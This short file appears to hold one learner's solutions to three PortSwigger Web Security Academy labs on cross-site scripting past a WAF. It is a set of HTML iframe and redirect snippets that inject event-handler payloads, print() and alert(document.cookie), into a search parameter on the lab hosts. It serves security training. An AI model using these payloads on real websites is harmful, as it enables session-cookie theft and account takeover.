
<!-- answer for waf in cross site scripting -->

<iframe src="https://0ace0018034813d583f50568008b004c.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.height='100px' >


    <!-- answer for waf in corss site scripting 2-->
    
    <script>
        location='https://0ad8003f040908b480fb587b00c200dc.web-security-academy.net/?search=%3Cfoo+onfocus%3D%22alert%28document.cookie%29%22+id%3D%22x%22+tabindex%3D%221%22%2F%3E#x'
    </script>
    
    
    <!-- answer for waf in corss site scripting 3-->
    
    <!-- Note when iframe is not allowed the best second thing to try is location (redrecting the the url address)-->
    
    <script>
        location='https://0a0c005d03b532138c07d0ce0099000b.web-security-academy.net/?search=%3Cfoo+onfocus%3D%22alert%28document.cookie%29%22+id%3D%22x%22+tabindex%3D%221%22%2F%3E#x'
    </script>
    
